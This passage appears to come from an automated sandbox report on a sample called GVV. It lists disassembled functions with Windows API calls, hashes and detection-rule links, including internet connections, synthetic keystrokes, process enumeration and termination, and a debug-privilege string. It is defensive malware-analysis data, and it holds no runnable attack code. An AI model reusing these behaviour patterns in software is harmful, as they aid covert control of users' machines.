                • API ID: HandleLoadMessageModuleString_wcslen
                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                • API String ID: 858772685-4153970271
                • Opcode ID: 6ad01d967e3d105380577dce40f07df54fa5f8c9918298928db6641c1c4b40c1
                • Instruction ID: 2506100b5f7007bf197bf114688912559890971c97df0e1d7f4d07dcf79db18c
                • Opcode Fuzzy Hash: 6ad01d967e3d105380577dce40f07df54fa5f8c9918298928db6641c1c4b40c1
                • Instruction Fuzzy Hash: 9B21913190021EFBDF15AF90CC06EEE7775FF28304F04446AF629660A2EB71A658DB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                Download Yara Rule
                APIs
                • GetParent.USER32 ref: 001720AB
                • GetClassNameW.USER32(00000000,?,00000100), ref: 001720C0
                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0017214D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ClassMessageNameParentSend
                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                • API String ID: 1290815626-3381328864
                • Opcode ID: 13fda0cc6b78335442b7d0b446934f7109ac5c81a886da7911f0e7e14fda5ca1
                • Instruction ID: d49ec6cf8666ffa6efccf7581d159327e16f42beaaba9ab440965ee61951c812
                • Opcode Fuzzy Hash: 13fda0cc6b78335442b7d0b446934f7109ac5c81a886da7911f0e7e14fda5ca1
                • Instruction Fuzzy Hash: 4C11557A288306BAFB056220DC07CE733ADEB15324F208017FB0DA51E2FF71A8435654
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0014CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                • String ID:
                • API String ID: 1282221369-0
                • Opcode ID: bc706388ae33c86d60ddfce82272aa0e8f558620d17640129e8121cd77dd6a17
                • Instruction ID: a86aaba15cedb6a2bfc81570d5b59ca09b5e0e165e6d1ad058aed9b217e9258f
                • Opcode Fuzzy Hash: bc706388ae33c86d60ddfce82272aa0e8f558620d17640129e8121cd77dd6a17
                • Instruction Fuzzy Hash: 53617871A05311AFDF22AFF4DC81A6EBBA5EF15320F04016DF9449B2A2DB359D8587E0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A50D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 001A5186
                • ShowWindow.USER32(?,00000000), ref: 001A51C7
                • ShowWindow.USER32(?,00000005,?,00000000), ref: 001A51CD
                • SetFocus.USER32(?,?,00000005,?,00000000), ref: 001A51D1
                  • Part of subcall function 001A6FBA: DeleteObject.GDI32(00000000), ref: 001A6FE6
                • GetWindowLongW.USER32(?,000000F0), ref: 001A520D
                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001A521A
                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 001A524D
                • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 001A5287
                • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 001A5296
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                • String ID:
                • API String ID: 3210457359-0
                • Opcode ID: df65b84c6037ff1c219b23869e98d09099fdb607eca386e318db4b395880491a
                • Instruction ID: 0fd17d8b4182d32ac39c79c6923e97600ccf39a7a33923e57b6ae2e980216d8a
                • Opcode Fuzzy Hash: df65b84c6037ff1c219b23869e98d09099fdb607eca386e318db4b395880491a
                • Instruction Fuzzy Hash: FE51C038A48A08FEEF349F24DC4ABE83B63FB17364F184012F615962E1C775A990DB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00128B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                Download Yara Rule
                APIs
                • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00166890
                • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 001668A9
                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 001668B9
                • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 001668D1
                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 001668F2
                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00128874,00000000,00000000,00000000,000000FF,00000000), ref: 00166901
                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0016691E
                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00128874,00000000,00000000,00000000,000000FF,00000000), ref: 0016692D
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Icon$DestroyExtractImageLoadMessageSend
                • String ID:
                • API String ID: 1268354404-0
                • Opcode ID: fcffff0ddeb829932b4b03445a00b200479423526bcd7b1bdb7958f10967c3f3
                • Instruction ID: 7a622557c3273d85cb6ab2542520ac92006341a588ed5a33b1db166c85c7cbd1
                • Opcode Fuzzy Hash: fcffff0ddeb829932b4b03445a00b200479423526bcd7b1bdb7958f10967c3f3
                • Instruction Fuzzy Hash: 90517770A00209EFDB24CF28DC95FAA7BB5FB58754F10451CF916976A0DB70E9A0DB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0018C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                Download Yara Rule
                APIs
                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0018C182
                • GetLastError.KERNEL32 ref: 0018C195
                • SetEvent.KERNEL32(?), ref: 0018C1A9
                  • Part of subcall function 0018C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0018C272
                  • Part of subcall function 0018C253: GetLastError.KERNEL32 ref: 0018C322
                  • Part of subcall function 0018C253: SetEvent.KERNEL32(?), ref: 0018C336
                  • Part of subcall function 0018C253: InternetCloseHandle.WININET(00000000), ref: 0018C341
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                • String ID:
                • API String ID: 337547030-0
                • Opcode ID: b8fd1e2d6ee40797263b2a133e0c48257c47172d4d4067c921cbf26a018d6338
                • Instruction ID: 51fde712da00edc966aa3af8100e8bb12ae0d6ef2710bc88a283ec307e423474
                • Opcode Fuzzy Hash: b8fd1e2d6ee40797263b2a133e0c48257c47172d4d4067c921cbf26a018d6338
                • Instruction Fuzzy Hash: 0B317E71100601AFDB21AFA5DC44A66BBFAFF19300B04441EF95682650DB31EA549FF0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001725A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00173A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00173A57
                  • Part of subcall function 00173A3D: GetCurrentThreadId.KERNEL32 ref: 00173A5E
                  • Part of subcall function 00173A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001725B3), ref: 00173A65
                • MapVirtualKeyW.USER32(00000025,00000000), ref: 001725BD
                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 001725DB
                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 001725DF
                • MapVirtualKeyW.USER32(00000025,00000000), ref: 001725E9
                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00172601
                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00172605
                • MapVirtualKeyW.USER32(00000025,00000000), ref: 0017260F
                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00172623
                • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00172627
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                • String ID:
                • API String ID: 2014098862-0
                • Opcode ID: 3fe869aa5cd55dcf2f8d7b98b9070e1b4b3404358123857a2587a92676fd33fa
                • Instruction ID: 348b8c22bbb715ae3326f1fb103341f60621bf8509610655fafb975e0eb5d17f
                • Opcode Fuzzy Hash: 3fe869aa5cd55dcf2f8d7b98b9070e1b4b3404358123857a2587a92676fd33fa
                • Instruction Fuzzy Hash: D801D431390210BBFB1067689C8AF993F69DB5EB12F104001F328EF1D1CAF224859AA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00171803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                Download Yara Rule
                APIs
                • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00171449,?,?,00000000), ref: 0017180C
                • HeapAlloc.KERNEL32(00000000,?,00171449,?,?,00000000), ref: 00171813
                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00171449,?,?,00000000), ref: 00171828
                • GetCurrentProcess.KERNEL32(?,00000000,?,00171449,?,?,00000000), ref: 00171830
                • DuplicateHandle.KERNEL32(00000000,?,00171449,?,?,00000000), ref: 00171833
                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00171449,?,?,00000000), ref: 00171843
                • GetCurrentProcess.KERNEL32(00171449,00000000,?,00171449,?,?,00000000), ref: 0017184B
                • DuplicateHandle.KERNEL32(00000000,?,00171449,?,?,00000000), ref: 0017184E
                • CreateThread.KERNEL32(00000000,00000000,00171874,00000000,00000000,00000000), ref: 00171868
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                • String ID:
                • API String ID: 1957940570-0
                • Opcode ID: 26595e6a937ef1dd53892523af34aed874e1361e67fc07d9685504c89f7ccb03
                • Instruction ID: ca5dfe7d492eaa26f5d31beae77a2c245a6f5656c71c4cac30d1c6a937c5b270
                • Opcode Fuzzy Hash: 26595e6a937ef1dd53892523af34aed874e1361e67fc07d9685504c89f7ccb03
                • Instruction Fuzzy Hash: BF01BBB5340308FFE710ABA5DC4DF6B3BACEB8AB11F008411FA05DB5A1DA709840CB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0019A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0017D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0017D501
                  • Part of subcall function 0017D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0017D50F
                  • Part of subcall function 0017D4DC: CloseHandle.KERNEL32(00000000), ref: 0017D5DC
                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0019A16D
                • GetLastError.KERNEL32 ref: 0019A180
                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0019A1B3
                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0019A268
                • GetLastError.KERNEL32(00000000), ref: 0019A273
                • CloseHandle.KERNEL32(00000000), ref: 0019A2C4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                • String ID: SeDebugPrivilege
                • API String ID: 2533919879-2896544425
                • Opcode ID: 1db0b87a02efbddac8138298670787670487699241a2bbc5cfd37d58c4a48bf7
                • Instruction ID: a75dc99e3f777c5e2834b07c89d4fa9253bd3d2988084c0aa8fea34f1f903c51
                • Opcode Fuzzy Hash: 1db0b87a02efbddac8138298670787670487699241a2bbc5cfd37d58c4a48bf7
                • Instruction Fuzzy Hash: 3F61A230208242AFDB14DF18C494F65BBE1AF54318F54849CE4664BBA3C772EC89CBD2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A3886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 001A3925
                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 001A393A
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 001A3954
                • _wcslen.LIBCMT ref: 001A3999
                • SendMessageW.USER32(?,00001057,00000000,?), ref: 001A39C6
                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 001A39F4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend$Window_wcslen
                • String ID: SysListView32
                • API String ID: 2147712094-78025650
                • Opcode ID: 420fb9e21b83197eb69541d247b2f706b0ee5c84b99a89c166855c56676db15b
                • Instruction ID: 8c84d026fb12863eb153a3f9c77071ffa777b47728c6465d3ada8b5ddf098a37
                • Opcode Fuzzy Hash: 420fb9e21b83197eb69541d247b2f706b0ee5c84b99a89c166855c56676db15b
                • Instruction Fuzzy Hash: 2241C275A00218ABEB219F64CC49FEA7BA9EF09354F100126F968E7281D7759E84CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                Download Yara Rule
                APIs
                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0017BCFD
                • IsMenu.USER32(00000000), ref: 0017BD1D
                • CreatePopupMenu.USER32 ref: 0017BD53
                • GetMenuItemCount.USER32(00DE58C8), ref: 0017BDA4
                • InsertMenuItemW.USER32(00DE58C8,?,00000001,00000030), ref: 0017BDCC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Menu$Item$CountCreateInfoInsertPopup
                • String ID: 0$2
                • API String ID: 93392585-3793063076
                • Opcode ID: f8986835a639e936862e208d1c6adc52d93f5632aea93e09a0faeaff78dba9bc
                • Instruction ID: 16ca86387b9a85efeab768b8f6a39410850136137afe4d3a8a6b745bd38b6377
                • Opcode Fuzzy Hash: f8986835a639e936862e208d1c6adc52d93f5632aea93e09a0faeaff78dba9bc
                • Instruction Fuzzy Hash: 4F519C70A082059FDB25CFE8D8C8BAEBBF4AF59318F14C219E419E7291E7709941CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                Download Yara Rule
                APIs
                • LoadIconW.USER32(00000000,00007F03), ref: 0017C913
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: IconLoad
                • String ID: blank$info$question$stop$warning
                • API String ID: 2457776203-404129466
                • Opcode ID: fbf920ab49e464c6d73c63aebde0845e54be26cae947286518a5ae86f7d95d64
                • Instruction ID: 57569a6b8df3fe9b20b73d88951383a0a7a4b2b3db9764e259d9e414b1e0c3c5
                • Opcode Fuzzy Hash: fbf920ab49e464c6d73c63aebde0845e54be26cae947286518a5ae86f7d95d64
                • Instruction Fuzzy Hash: 6E11EB3168930ABBE7055B549C83CEA77BCDF15358B10402FF609A6282D7606D4052E5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017DE27 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                • String ID: 0.0.0.0
                • API String ID: 642191829-3771769585
                • Opcode ID: 1c8a8d1f845da58c64cd5cfb35d94046a3c7a267e2df09533ac562dc7bebff0b
                • Instruction ID: 6b1c4ab15f94e7213404d842baa5c5e4266004c9792229fba894392943a4b383
                • Opcode Fuzzy Hash: 1c8a8d1f845da58c64cd5cfb35d94046a3c7a267e2df09533ac562dc7bebff0b
                • Instruction Fuzzy Hash: 0C112931904119AFDB25AB70EC0AEEF77BCDF29721F0141A9F40996091EF719AC18B90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _wcslen$LocalTime
                • String ID:
                • API String ID: 952045576-0
                • Opcode ID: b1f09505b1d8c9fc583e4e7d1110adb96326ba6066143fc2359be845329a4b6e
                • Instruction ID: 077fef01128e9916abeee1afb4d1dd3a8b3c8aa3c1c96486f25768d1f74eafb7
                • Opcode Fuzzy Hash: b1f09505b1d8c9fc583e4e7d1110adb96326ba6066143fc2359be845329a4b6e
                • Instruction Fuzzy Hash: 34419365C1021876CB11EBF4D88AADFB7F8AF69710F508862F518E3121FB34E255C3A6
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0012F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                Download Yara Rule
                APIs
                • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0016682C,00000004,00000000,00000000), ref: 0012F953
                • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0016682C,00000004,00000000,00000000), ref: 0016F3D1
                • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0016682C,00000004,00000000,00000000), ref: 0016F454
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ShowWindow
                • String ID:
                • API String ID: 1268545403-0
                • Opcode ID: 631300881fab12db2452cd9036dc9e9442cfb26d91e944252278561218a8dafc
                • Instruction ID: 6b847e7a252549b4b69994036980b97d93c1a114cfe06335c9b1339474ccc81d
                • Opcode Fuzzy Hash: 631300881fab12db2452cd9036dc9e9442cfb26d91e944252278561218a8dafc
                • Instruction Fuzzy Hash: F441E931608690BECF399B29BC8872A7BB2BB56318F15443CF04756A61D731A8E2CB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                Download Yara Rule
                APIs
                • DeleteObject.GDI32(00000000), ref: 001A2D1B
                • GetDC.USER32(00000000), ref: 001A2D23
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001A2D2E
                • ReleaseDC.USER32(00000000,00000000), ref: 001A2D3A
                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 001A2D76
                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 001A2D87
                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,001A5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 001A2DC2
                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 001A2DE1
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                • String ID:
                • API String ID: 3864802216-0
                • Opcode ID: deba0bcf8256aecf873a2eee41db0c38a372f06d19ff1be6815ed34274ab16c6
                • Instruction ID: 3b3b46a0fe4efe182bdf7bcf69967275aacc0cf3f1256ae608a5027af0b7b8b6
                • Opcode Fuzzy Hash: deba0bcf8256aecf873a2eee41db0c38a372f06d19ff1be6815ed34274ab16c6
